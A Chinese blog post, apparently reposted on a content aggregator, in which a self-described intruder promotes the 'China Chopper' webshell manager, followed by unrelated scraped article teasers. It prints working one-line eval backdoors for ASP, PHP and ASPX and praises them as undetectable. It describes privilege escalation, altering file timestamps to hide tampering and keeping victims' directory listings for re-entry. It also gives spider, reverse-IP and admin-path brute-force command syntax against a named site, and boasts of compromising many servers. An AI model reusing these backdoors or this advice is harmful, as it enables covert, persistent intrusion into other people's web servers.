简评黑客利器——中国菜刀

来源:http://edu2b.sinaapp.com/?p=236&replytocom=17

作者:XXX
我是一个玩黑很多年的人,入侵了大大小小的服务器无数,体验着入侵快感的同时,自己的技术和经验也不断提高,在渗透过程中收集了大大小小的工具一堆,都快把自己的U盘放满了,当然,随着时代和技术的进步,很多工具也相应的过时了,但是却很少去删掉,看着那些熟悉的图标,熟悉的界面,就好象看到了自己一步步成长的过程,这其中有很多是自己的作品,看着那些逐渐从丑陋过渡到简陋再过渡到精美的软件界面,呵呵,这其中的滋味,真的很感慨。
由于脚本是我自己的弱项,于是这些年收集了很多脚本后门,比如早期的站长管理助手,海洋顶端系列,砍客一句话后门,虫虫催化剂后门,还有angel的phpspy等等系列,数不胜数,当然还有后期的一堆美化版,加强版,超级加强版。算起来,娇娘asp后门美化版,是我所知的第一个流传较广的美化修改版,后来逐渐被更新的海洋顶端网替代了,渐渐淡出人们的视野,以上种种,asp,aspx,php,jsp,cfm,php,甚至wap协议通用的脚本后门,箩箩筐筐收集了一大堆,都快有10M大小了。这其中有一堆脚本是另一堆脚本的子集,而不是交集,还有不少是有后门的,不过我也懒得去分辨和筛选了,毕竟这些东东能让我用到的时候不多,常用的还是那几个脚本,比如ASP环境用这个,PHP环境用那个,JSP环境用那个,除非某些比较特别的功能,是这个常用的脚本后门里面没有的,我才去找那些不常用的脚本后门来临时代替一下,这些弄起来很烦,所以我一直在寻找着一款真正合心意的脚本后门,终于……..,我发现了一个远超我想象的脚本后门——-中国菜刀。
说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了
C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand
等等,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页,一举成名。
作者是一个朴实,低调的技术牛人,他这些年留下的作品很多,中国菜刀是他最新的一个作品,从他之前的作品WEBSHELL管理器的基础上修改而来,功能更加的强大。
你见过很强大的ASP后门,很强大的PHP后门,很强大的ASPX后门,那你见过很强大的asp,aspx,php三合一后门么……..,没有吧,尤其是这个后门,只有一句话。
Asp环境:<%eval request(“a”)%>
Php环境:<?php @eval($_POST['a']);?>
Aspx环境:<% @page Language=”Jscript”><%eval(Request.item["a"],”unsafe”);%>
是不是很震憾,很不可思议,是的,我刚接触的时候,也是这样的想法,就这三句话,一个名不见经传的“中国菜刀”,就可以代替我那搜集了几年,大大小小几百个多种平台多种环境的脚本后门?,事实证明,我错了,原来“中国菜刀”不仅仅可以代替那些后门,而且他的功能超出我的想象,就让我慢慢说明吧。
1.就从最基本的讲起,你的脚本是不是经常被杀,你怎么变形都被杀,,传到服务器被杀导致被管理员发现,结果你的权限就没了,杀到你欲哭无泪。菜刀的一句话后门,可以避免这个问题,只有短短的一行代码,永远不会被查杀。
2.你是不是很郁闷你的后门传到服务器上连他妈都不认识了,框架变形,字体变框框,点击菜单无效,这个是因为系统语言不兼容造成的,菜刀是UINCODE方式编译,支持多国语言输入显示,完全不存在兼容性问题。
3.你是不是有很多webshell,你每次都拿记事本记下来,需要的时候,又去翻半天,弄得你很累很没脾气。有了“菜刀”,你可以很方便管理你的webshell,所有的记录都保存在加密的本地数据库里,而且支持webshell分类,让你管理得井井有条。菜刀不仅有临时锁定功能,方便你离开电脑的那小会时间不被别人偷你的webshell,也有加密功能,不输对密码,HOHO,偷了你的数据也没用。
4.再来说说数据库管理,这个是菜刀最最强大的功能,精通各平台主流数据库的作者,把这个功能写的是淋漓尽致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等数据库,支持不是最主要的,功能强大,人性化才是最主要的,“菜刀”的数据库操作界面,内置了常用的数据库语句,非常直观的表列名浏览功能,自动显示表名,列名,查询语句,非常人性化的设计,更内置了不少自建的函数,方便不懂数据库的菜鸟,都能查阅数据库里的数据,再说个“菜刀”数据库管理的一个小技巧,对于access数据库,可以在菜刀的webshell操作界面,对着MDB文件点右键,点Access Management,就直接进入Access的数据库操作界面了,方便吧,嘿嘿!!
5.再说说提权这块,webshell的提权总是最让人关心的,说到提权,就不能说到webshell上的cmd执行了,有些朋友并不了解菜刀的自定义CMD路径功能,有两种方法可以设置指定的cmd路径,一就是在cmd操作界面,输入setp d:\cmd.exe,就可以了,或者把cmd.exe上传到目录,然后点右键,点virtual terminal file,就可以进入自定义CMD.EXE路径的命令行了,同样的,再给个cmd使用的小技巧,在菜刀的命令行里,可以使用cd等命令跳转目录,方便吧,嘿嘿!!嗯,另外,新版菜刀新增常用目录管理功能,你可以把你常用的目录或者提权的目录加进菜刀里,这样很方便你提权或者日常工作,是不是比那些固定了提权目录的脚本后门要牛B的多啊,哈哈。
6.还有菜刀的webshell上的文件功能功能,也是非常人性化的,文件夹和文件的图标完全模枋windows,,文件日期,文件大小,文件权限,一目了然,尤其是修改文件时间功能,非常的方便,直接对着要修改时间的文件点右键,modify the file time,然后在文件的时间那栏,输入时间,回车,就修改完了。当然,菜刀的文件管理还有新建,删除,上传,下载,编辑功能,这些大同小异,就不一一细说了。不过有个功能,还是要重点说明的,那就是目录缓存功能,菜刀可以把浏览过的webshell目录都缓存在本地,这样可以方便下次访问的时候更加快捷,最重要的是,当哪天你的权限丢了,起码你还有对方服务器的文件目录结构,方便再一次渗透。
说完大家都有的脚本后门功能,现在来说点特别的菜刀功能,非常特别跟实用的哦。菜刀的前身是WEBSHELL管理器,再结合了作者之前的web管理软件等几个工具的优点,实在是大杀器的集合体。
1:蜘蛛爬行。我很喜欢用WVS,对于WEB安全这块,功能是非常的强大,我很喜欢里面的一个功能,目录爬行,可以把WEB站的文件目录结构以很直观的形式排列出来,很方便分析。我非常惊喜的发现,菜刀居然也有这个功能,叫蜘蛛爬行。
用法:
{spider} {url:http://www.xunest.com/}
设定爬行范围
{spider} {url:http://www.xunest.com/} {range:xunest.com}
跟WVS的功能完全一样,我上次上传webshell图片的时候,不知道脚本后门给传到哪个目录,结果用菜刀的蜘蛛爬行功能找出来了,真是强大。
2:旁注查询。在渗透的时候,旁注是非常关键的,不知有多少大站是死在他邻居的进攻下啊。你见过查询同服务器的所有域名,那你见过查询同C段的所有域名不,呵呵,菜刀就可以做到
用法:
查单一IP的绑定域名
{reverse_ip} {url:http://www.xunest.com/}
扫描本C段开放的WEB服务器,并查询绑定域名
{reverse_ip_c} {url:http://www.xunest.com/}
3:字典爆破功能。你是不是很喜欢webtool的目录扫描功能呢,既然菜刀是集大成之所有者,自然是不会少了这个功能的,而且功能更加强大。
用法:
{crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}
{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}
{crack} {url:http://www.xunest.com/%s/} {flag:successfully} {dict:list.txt}
%s为dict中的一行, flag:后面为返回的数据(含HTTP头部)中的特定关键字,加!!为不包含关键字为TRUE,否则包含关键字为TRUE, list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
这个目录爆破功能,是非常灵活跟强大的,首先,可以根据返回的数据包自定义来判断目录是否存在,然后可以爆破已知目录的上级目录,举个例子,假如你知道你的目录是guanli,但是你是不知道guanli这个目录是在哪个目录里面,那么你可以
{crack} {url:http://www.xunest.com/%s/guanli/} {flag:HTTP/1.1 200} {dict:list.txt}
其实呢,菜刀还是一个浏览器。。。。。,真的,不骗你,菜刀的浏览器功能,非常简单,却非常实用,可以很方便的禁止或者开启网站的脚本、控件执行,图片显示开关,最最方便的,还是cookies编辑功能了,这个是非常重要的,谁用谁知道。菜刀的浏览器是可以直接post提交的,这个功能有什么用,相信黑黑们也不用我多说了吧。另外一个,就是自定义JS,这个据说也是很强大的,但我暂时还没用到这个功能。
总结一下,菜刀一直在完善,一直在更新,发展到现在,已经不仅仅是一个webshell管理器,可以说是一个大杀器的集合体,就算完全抛弃里面的webshell管理功能,菜刀也是一个很不错的浏览器,很不错的后台扫描工具,很不错的cookies编辑提交工具,很不错的文件管理工具,很不错的旁注软件,不单是方便各位黑客朋友使用,也很方便站长使用,毕竟里面的文件管理功能,上传下载,比FTP更加直观了,最重要的,菜刀的数据库管理功能,真的是前无古人,后无来者,非常非常方便,严重推荐大家使用。
另附作者的下一步开发计划,菜刀即将支持JSP,CFM等等,更加灵活,也考虑开放菜刀的协议跟接口,这样的话,大家可以自由写插件,也不局限于eval这样的一句话后门,另外,菜刀也将继续保持以人为本的人性化设计,会更加灵活,欢迎大家提意见。
中国菜刀的官方网站—http://www.maicaidao.com,上面有很详细的软件使用截图,也可以下载到最新版的菜刀。
本文固定链接: http://edu2b.sinaapp.com/?p=236 | yueyan's Blog

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/497770.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2017,AI偏见为何如此受关注?

来源&#xff1a;亿欧概要&#xff1a;从荒谬到令人不寒而栗&#xff0c;算法偏见在社会中产生越来越大的影响&#xff0c;而且这一问题已经暴露多年。但直到2017年&#xff0c;人们对AI算法偏见的公众意识似乎才达到了一个临界点。佛罗里达州的一项犯罪预测算法错误地将黑人罪…

android aidl工具,【Android】AIDL介绍和实例讲解

前言为使应用程序之间能够彼此通信&#xff0c;Android提供了IPC (Inter Process Communication&#xff0c;进程间通信)的一种独特实现&#xff1a; AIDL (Android Interface Definition Language&#xff0c; Android接口定义语言)。网上看了几篇关于AIDL的文章&#xff0c;写…

MySQL新建用户,授权,删除用户,修改密码

来源&#xff1a;http://www.cnblogs.com/analyzer/articles/1045072.html 首先要声明一下&#xff1a;一般情况下&#xff0c;修改MySQL密码&#xff0c;授权&#xff0c;是需要有mysql里的root权限的。 注&#xff1a;本操作是在WIN命令提示符下&#xff0c;phpMyAdmin同样…

机器学习 TOP 10 必读论文 | 资源

来源&#xff1a;AI科技大本营编辑 | DonnaMedium上的机器学习深度爱好者必关注的账号Mybridge照例对11月发表的学术论文进行了排名&#xff0c;整理出了10篇必读论文&#xff0c;建议收藏深读。1. Alpha Zero&#xff1a;用强化学习算法对中国象棋和国际象棋进行自我修炼&…

爱奇艺首页底部导航按钮android,仿爱奇艺/腾讯视频ViewPager导航条实现

仿爱奇艺/腾讯视频ViewPager导航条实现&#xff0c;支持自定义导航条高度&#xff0c;宽度&#xff0c;颜色变化&#xff0c;字体大小变化。支持多种滚动模式&#xff0c;支持自定义每个TabView的样式。项目地址&#xff1a;https://github.com/KCrason/DynamicPagerIndicatord…

详解MYSQL数据库密码的加密方式及破解方法

来源&#xff1a;http://www.heibai.net/articles/hacker/mimapojie/2009/0908/841.html MYSQL数据库用户密码跟其它数据库用户密码一样&#xff0c;在应用系统代码中都是以明文出现的&#xff0c;在获取文件读取权限后即可直接从数据库连接文件中读取&#xff0c;例如asp代码中…

4-Docker命令之docker logs

1.docker logs介绍 docker logs命令是用来获取docker容器的日志 2.docker logs用法 docker logs [参数] CONTAINER [root@centos79 ~]# docker logs --helpUsage: docker logs [OPTIONS] CONTAINERFetch the logs of a containerAliases:docker container logs, docker lo…

亚马逊等智能音箱“偷听”用户 被指收集隐私

来源&#xff1a;中国评论通讯社概要&#xff1a;近日&#xff0c;美国消费者保护组织Consumer Watchdog出具的一份报告显示&#xff0c;来自亚马逊和谷歌的专利申请曝光了其智能音箱是如何“偷听”用户的。据英国《每日邮报》报道&#xff0c;近日&#xff0c;美国消费者保护…

android camera捕捉,通过android camera2 API捕捉4:3相机图片与16:9传感器阵列相机

我想从使用Camera2 API(Android 5.0版本中添加)的Android fron-facing相机以4&#xff1a;3的宽高比捕捉视频。它工作正常&#xff0c;除非相机有16&#xff1a;9传感器阵列(作为三星Galaxy S5上的前置摄像头)。在这种情况下&#xff0c;图像看上去就像是16&#xff1a;9图像被…

HTTP 相应头相关

If-Modified-Since & If-None-MatchIf-Modified-Since&#xff0c;和 Last-Modified 一样都是用于记录页面最后修改时间的 HTTP 头信息&#xff0c;只是 Last-Modified 是由服务器往客户端发送的 HTTP 头&#xff0c;而 If-Modified-Since 则是由客户端往服务器发送的头&am…

基于互联网云脑架构分析百度的现状与未来

前言&#xff1a;这是未来智能实验室基于互联网云脑架构&#xff0c;对世界科技企业的未来发展趋势进行分析的文章。因为百度排在BAT的首位&#xff0c;因此这个系列研究文章就从百度开始进行研究。作者&#xff1a;刘锋 计算机博士&#xff0c;互联网进化论作者互联网云脑&am…

华为鸿蒙操作界面,华为鸿蒙被“实锤”,操作界面曝光,为何被吐槽是换皮安卓?...

4月已经进入尾声&#xff0c;但鸿蒙系统的消息最近却变少了&#xff0c;记得此前发布Mate X2的时候&#xff0c;余承东表示要在4月份开始推送鸿蒙系统&#xff0c;Mate X2会成为首批升级机型。然而目前有不少用户吐槽称&#xff0c;依然还没有等到鸿蒙系统的推送&#xff0c;毕…

将文件内含有的特殊字符还原

如下文件内容&#xff1a; 这里有特殊字符&#xff1a;\n 、\t 、\u4e0a 、\/ 我要做的事&#xff0c;就是恢复其特殊字符的作用&#xff08;而不是打印被转义后的效果&#xff09; 直观的看&#xff0c;很容易&#xff1a;直接替换不就行了 line line.replaceAll("\\n&…

【深度】谭铁牛院士谈人工智能发展新动态

来源&#xff1a; Frontiers11月25日&#xff0c;模式识别与人工智能学科前沿研讨会在自动化所召开。会上&#xff0c;谭铁牛院士做“人工智能新动态”报告&#xff0c;回顾了近代以来历次科技革命及其广泛影响&#xff0c;并根据科学技术发展的客观规律解释了当前人工智能备受…

android keyboard用法,react-native-android-keyboard-adjust 最新使用方法 0.63

react-native 安卓动态调整 android:windowSoftInputMode"stateAlwaysHidden|adjustResize" 键盘模式最近尝试使用, 还能正常工作, 最新的react-native0.63依然可以正常使用, 方法如下:npm install --save react-native-android-keyboard-adjust1.2.0 装包复制 Andro…

屏蔽在线视频广告的方法

原理是改hosts的&#xff01; 第一步&#xff1a;找到C:\WINDOWS\system32\drivers\etc里面的hosts文件,双击打开&#xff0c;选用记事本打开。 #优酷 127.0.0.1 atm.youku.com 127.0.0.1 Fvid.atm.youku.com 127.0.0.1 html.atm.youku.com 127.0.0.1 valb.atm.youku.com …

android批处理脚本,BAT批处理一键生成APK包脚本分享

BAT批处理一键生成APK包脚本分享将本bat放到cocos2dx目录下你的工程的project.android下(需修改变量)。ASmaker 用来将Resources文件夹下的lua文件批量加密 算法参考我之前的rc4算法实现。每次打包apk前 svn 最新的工程代码 和 cocos2dx引擎代码。echo offrem 工具路径set JAVA…

智能产品AI服务智商的权重研究|未来研究

作者&#xff1a;刘锋 计算机博士 互联网进化论作者前言&#xff1a;本文是未来智能实验室关于智能产品智商的最新研究文章&#xff0c;在提出人工智能的三种智商后&#xff0c;通过德尔菲法&#xff0c;对智能产品AI 服务智商的权重进行了确定&#xff0c;为2018年智能产品的…

前端 html5 css3 框架,UI,分享,CSS3,HTML5,前端框架

随着HTML5和CSS3以及网页设计布局的全面翻新创新改革。让很多网页设计者和界面设计师都知道一个道理。就是去掌握一套对应的工具包。这不仅仅是未来提高工作的效率&#xff0c;还能更好的去处理网页整体视觉效果。界面也可以做得更有交互性。优秀的工具包可以让您的工作事半功倍…

深入理解闭包

详细出处参考&#xff1a;http://www.jb51.net/article/24101.htm 一、变量的作用域 要理解闭包&#xff0c;首先必须理解Javascript特殊的变量作用域。 变量的作用域无非就是两种&#xff1a;全局变量和局部变量。 Javascript语言的特殊之处&#xff0c;就在于函数内部可…